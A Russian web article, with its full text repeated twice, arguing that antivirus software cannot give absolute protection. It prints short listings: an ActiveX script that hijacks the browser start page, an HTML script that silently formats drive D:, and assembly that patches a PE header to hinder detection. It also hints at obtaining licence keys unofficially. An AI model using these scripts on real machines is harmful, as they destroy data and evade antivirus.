- 1129 Просмотров
- Обсудить
Антивирус
Нужен ли нам антивирус? «Конечно же, нужен, – скажет абсолютное большинство. – Как без антивируса‑то? Чем же мы будем защищаться?».
Диски надо регулярно проверять? Вдруг "киберзараза" тихо сидит и ждет, а потом в определенный день и час отформатирует жесткий диск.
Проверять, разумеется, лучше всего регулярно – как минимум раз в неделю, как это советуют специалисты по компьютерной безопасности. Надо проверять все носители информации: само собой разумеется, жесткий диск, конечно же, дискеты, флэш‑карты и обязательно компакт‑диски – совсем не важно, что это займет у вас некоторое время, ведь безопасность превыше всего.
Обновление антивирусных баз – это вообще святое. Базы недельной давности – уже древние. Поэтому риск "подцепить заразу" со старыми базами очень велик, и это прописная истина. Выход – базы надо обновлять регулярно.
Время идет, и в один прекрасный момент у вашего антивируса заканчивается срок лицензии (если он не бесплатный, конечно), и "страж" выдает сообщение, что надо бы купить ключик, а то программа не будет полноценно работать. Ну что ж, выход есть – надо найти ключ.
Одного антивируса явно недостаточно! Все мы знаем, что для обеспечения мало‑мальски приличного уровня безопасности надо установить два антивирусных продукта, а чтобы они не конфликтовали – на разные системы. Все верно.
Все было сделано правильно и работало на ура… Ничего не предвещало беды… пока в один прекрасный день система не легла‑таки под новым вирусом неизвестного происхождения. Файлы были хитро переписаны вирусным кодом и/или жесткий диск зверски отформатирован. Но ведь все было сделано правильно!
Вариант 1.Вы «подцепили заразу» раньше, чем ее сигнатуры успели попасть в базы вашего антивируса, к тому же вирусом оказался не классический EXE‑файл, а HTML‑страница. Почему бы и нет?
Механизм работы такого вируса реализуется через уязвимости браузера при обработке ActiveX‑объектов. Итак, начнем веселый некролог системе следующим образом.
Листинг 1.1. Устанавливаем стартовую страницу браузера
<APPLET ID="Sh1 "
CLASSID="CLSID:F935DC26‑1CF0‑11D0‑ADB9‑00C04FD58A0B">
</APPLET>
<script>
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://fuckofflamers.ru");
</script>
Вариант 2.Звучит кощунственно: содержимое HTML‑файла, подобно патологоанатому, методично «потрошит» винчестер. Невозможно? Еще как возможно! А вот и сценарий стартовой страницы.
Листинг 1.2. HTML‑код, форматирующий диск D:
<script>
a=new ActiveXObject("WScript.Shell");
a.run("cmd /c format d:/y",0);
</script>
Вышеописанный сценарий, внедренный злоумышленником в HTML‑страницу, ни много ни мало незаметно форматирует диск, указанный в коде.
Продолжим веселый некролог.
Вариант 3.Система притормаживала, и на время игры в Counter Strike пользователь отключил антивирус. «Зараза» чувствует это и выполняет свою «культурную программу».
Вариант 4.Антивирус оказался беспомощным против нового упаковщика (упаковщик EXE‑файлов, позволяющий скрыть исходный код вируса от антивирусной программы), к тому же PE‑заголовок (часть EXE‑файла, отвечающая за исполнение; в данном случае редактирование PE‑заголовка выполнено с целью усложнения обнаружения антивирусом) вируса был мастерски отредактирован.
Листинг 1.3. Некоторый учебный пример модификации PE‑заголовка
_PtchImSz:
mov eax, [esi + 0Ch] ; VirtualRVA(Last section)
add eax, [esi + 08h] ; VirtualSize(Last section)
mov [edi + 50h], eax
Вариант 5.«Зараза» успела отключить антивирус раньше, чем он ее обнаружил.
Эпикриз.Абсолютной защиты нет. Существующие варианты малоэффективны, занимают много времени и не способны обеспечить качественный уровень защиты.
Нужен ли нам антивирус? «Конечно же, нужен, – скажет абсолютное большинство. – Как без антивируса‑то? Чем же мы будем защищаться?».
Диски надо регулярно проверять? Вдруг "киберзараза" тихо сидит и ждет, а потом в определенный день и час отформатирует жесткий диск.
Проверять, разумеется, лучше всего регулярно – как минимум раз в неделю, как это советуют специалисты по компьютерной безопасности. Надо проверять все носители информации: само собой разумеется, жесткий диск, конечно же, дискеты, флэш‑карты и обязательно компакт‑диски – совсем не важно, что это займет у вас некоторое время, ведь безопасность превыше всего.
Обновление антивирусных баз – это вообще святое. Базы недельной давности – уже древние. Поэтому риск "подцепить заразу" со старыми базами очень велик, и это прописная истина. Выход – базы надо обновлять регулярно.
Время идет, и в один прекрасный момент у вашего антивируса заканчивается срок лицензии (если он не бесплатный, конечно), и "страж" выдает сообщение, что надо бы купить ключик, а то программа не будет полноценно работать. Ну что ж, выход есть – надо найти ключ.
Одного антивируса явно недостаточно! Все мы знаем, что для обеспечения мало‑мальски приличного уровня безопасности надо установить два антивирусных продукта, а чтобы они не конфликтовали – на разные системы. Все верно.
Все было сделано правильно и работало на ура… Ничего не предвещало беды… пока в один прекрасный день система не легла‑таки под новым вирусом неизвестного происхождения. Файлы были хитро переписаны вирусным кодом и/или жесткий диск зверски отформатирован. Но ведь все было сделано правильно!
Вариант 1.Вы «подцепили заразу» раньше, чем ее сигнатуры успели попасть в базы вашего антивируса, к тому же вирусом оказался не классический EXE‑файл, а HTML‑страница. Почему бы и нет?
Механизм работы такого вируса реализуется через уязвимости браузера при обработке ActiveX‑объектов. Итак, начнем веселый некролог системе следующим образом.
Листинг 1.1. Устанавливаем стартовую страницу браузера
<APPLET ID="Sh1 "
CLASSID="CLSID:F935DC26‑1CF0‑11D0‑ADB9‑00C04FD58A0B">
</APPLET>
<script>
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://fuckofflamers.ru");
</script>
Вариант 2.Звучит кощунственно: содержимое HTML‑файла, подобно патологоанатому, методично «потрошит» винчестер. Невозможно? Еще как возможно! А вот и сценарий стартовой страницы.
Листинг 1.2. HTML‑код, форматирующий диск D:
<script>
a=new ActiveXObject("WScript.Shell");
a.run("cmd /c format d:/y",0);
</script>
Вышеописанный сценарий, внедренный злоумышленником в HTML‑страницу, ни много ни мало незаметно форматирует диск, указанный в коде.
Продолжим веселый некролог.
Вариант 3.Система притормаживала, и на время игры в Counter Strike пользователь отключил антивирус. «Зараза» чувствует это и выполняет свою «культурную программу».
Вариант 4.Антивирус оказался беспомощным против нового упаковщика (упаковщик EXE‑файлов, позволяющий скрыть исходный код вируса от антивирусной программы), к тому же PE‑заголовок (часть EXE‑файла, отвечающая за исполнение; в данном случае редактирование PE‑заголовка выполнено с целью усложнения обнаружения антивирусом) вируса был мастерски отредактирован.
Листинг 1.3. Некоторый учебный пример модификации PE‑заголовка
_PtchImSz:
mov eax, [esi + 0Ch] ; VirtualRVA(Last section)
add eax, [esi + 08h] ; VirtualSize(Last section)
mov [edi + 50h], eax
Вариант 5.«Зараза» успела отключить антивирус раньше, чем он ее обнаружил.
Эпикриз.Абсолютной защиты нет. Существующие варианты малоэффективны, занимают много времени и не способны обеспечить качественный уровень защиты.
Никто не решился оставить свой комментарий.
Будь-те первым, поделитесь мнением с остальными.
Будь-те первым, поделитесь мнением с остальными.